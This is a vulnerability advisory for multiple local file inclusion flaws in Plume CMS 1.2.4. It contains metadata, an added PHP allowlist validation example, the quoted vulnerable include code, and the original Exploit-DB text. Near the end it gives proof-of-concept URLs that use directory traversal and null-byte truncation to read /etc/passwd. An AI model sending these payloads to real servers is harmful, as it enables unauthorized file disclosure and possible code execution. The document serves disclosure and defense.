Vendor: Plume CMS
By: eidelweiss
CVSS: 8.8 (HIGH)
Type: Local File Inclusion
CWE: 98
Product Name: Plume CMS
Affected Version From: 1.2.4
Affected Version To: 1.2.4
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Plume CMS 1.2.4 Multiple Local File Inclusion Vulnerabilities

Plume CMS is a fully functional Content Management System in PHP on top of MySQL. It is vulnerable to Local File Inclusion (LFI) due to the lack of proper input validation in the 'plume/manager/articles.php', 'plume/manager/tools.php' and 'plume/manager/news.php' files. An attacker can exploit this vulnerability to include malicious files from the local system and execute arbitrary code.

Mitigation:

Input validation should be implemented to prevent attackers from including malicious files from the local system.
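
One way to apply that validation to the `p` parameter of plume/manager/tools.php, shown as an added example that is not Plume CMS code or a vendor patch. The helper name resolve_plugin_index() and the temporary plugin tree are assumptions made for the demonstration; the include paths built from `_PX_config[manager_path]` are not covered here.

```php
<?php
// Added example, not Plume CMS code. resolve_plugin_index() is a hypothetical helper.

/**
 * Return the absolute path of <root>/<plugin>/index.php, or null when the
 * request value is not an active plugin located inside $pluginsRoot.
 */
function resolve_plugin_index(string $pluginsRoot, $requested, array $pluginsList): ?string
{
    // Reject arrays (p[]=x) and anything that is not a plain plugin id.
    // The character class excludes '/', '\', '.' and NUL, so traversal
    // sequences and %00 truncation never reach the filesystem.
    if (!is_string($requested) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $requested)) {
        return null;
    }
    // Allowlist: the id must be a known plugin that is marked active.
    if (empty($pluginsList[$requested]['active'])) {
        return null;
    }
    // Defense in depth: canonicalise and confirm containment (catches symlinks).
    $root = realpath($pluginsRoot);
    $path = realpath($pluginsRoot . '/' . $requested . '/index.php');
    if ($root === false || $path === false) {
        return null;
    }
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo data: a temporary plugin tree with one active plugin.
$root = sys_get_temp_dir() . '/px_tools_' . bin2hex(random_bytes(4));
mkdir($root . '/stats', 0700, true);
file_put_contents($root . '/stats/index.php', "<?php echo 'stats plugin';\n");
$plugins = ['stats' => ['active' => true], 'old' => ['active' => false]];

// Constructed request values, including the traversal string from the advisory.
$samples = ['stats', 'old', '../../../../../../etc/passwd', "stats\0", ['stats']];
foreach ($samples as $p) {
    $target = resolve_plugin_index($root, $p, $plugins);
    printf("%-34s => %s\n", json_encode($p), $target === null ? 'rejected' : 'include ' . $target);
}

// Remove the demo tree.
unlink($root . '/stats/index.php');
rmdir($root . '/stats');
rmdir($root);
```

Only the first sample resolves to a path; the caller would include the returned path and treat null as a failed request.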

Exploit-DB raw data:

########################################################
Plume CMS 1.2.4 Multiple Local File Inclusion Vulnerabilities
########################################################

[+]Title:	Plume CMS 1.2.4 Multiple Local File Inclusion Vulnerabilities
[+]Version:	1.2.4 (other or lower version may be also affected)
[+]Download:	http://sourceforge.net/projects/pxsystem/files/
[+]Author:	eidelweiss
[+]Contact:	eidelweiss[at]cyberservices[dot]com		

	[!]Thank`s To: All Friends & All Hackers

########################################################
Description:
Plume CMS is a fully functional Content Management System in PHP on top of MySQL. 
Including articles, news, file management and all of the general functionalities of a CMS. 
It is completely accessible and very easy to use on a daily basis. 
########################################################

	-=[ Vuln C0de ]=-

[-] plume/manager/articles.php
**********************
require_once 'path.php';
require_once $_PX_config['manager_path'].'/prepend.php';
require_once $_PX_config['manager_path'].'/inc/class.article.php';	// <= line 26

**********************
[-] plume/manager/tools.php
**********************
# Build the list of plugins
$plugins_root = dirname(__FILE__).'/tools/';

$objPlugins = new plugins($plugins_root);
$plugins_list = $objPlugins->getPlugins();

$include = '';

if (!empty($_REQUEST['p']) && !empty($plugins_list[$_REQUEST['p']])
    && $plugins_list[$_REQUEST['p']]['active']) {
	$px_submenu->addItem(__('Back to the tools'), 'tools.php',
                         'themes/'.$_px_theme.'/images/ico_back.png',
                         false);
	$p = $_REQUEST['p'];
	$_px_ptheme = $m->user->getPluginTheme($p);
	ob_start();
	include $plugins_root.$p.'/index.php'; 	// <= line 54
	$include = ob_get_contents();
**********************
[-] plume/manager/news.php
**********************
require_once 'path.php';
require_once $_PX_config['manager_path'].'/prepend.php';
require_once $_PX_config['manager_path'].'/inc/class.news.php';

**********************


	-=[ Proof Of Concept ]=-

	http://127.0.0.1/plume/manager/articles.php?_PX_config[manager_path]=../../../../../../etc/passwd%00

	http://127.0.0.1/plume/manager/tools.php?p=../../../../../../etc/passwd%00

	http://127.0.0.1/plume/manager/plume/manager/news.php?_PX_config[manager_path]=../../../../../../etc/passwd%00

	etc , etc , etc.

####################=[E0F]=####################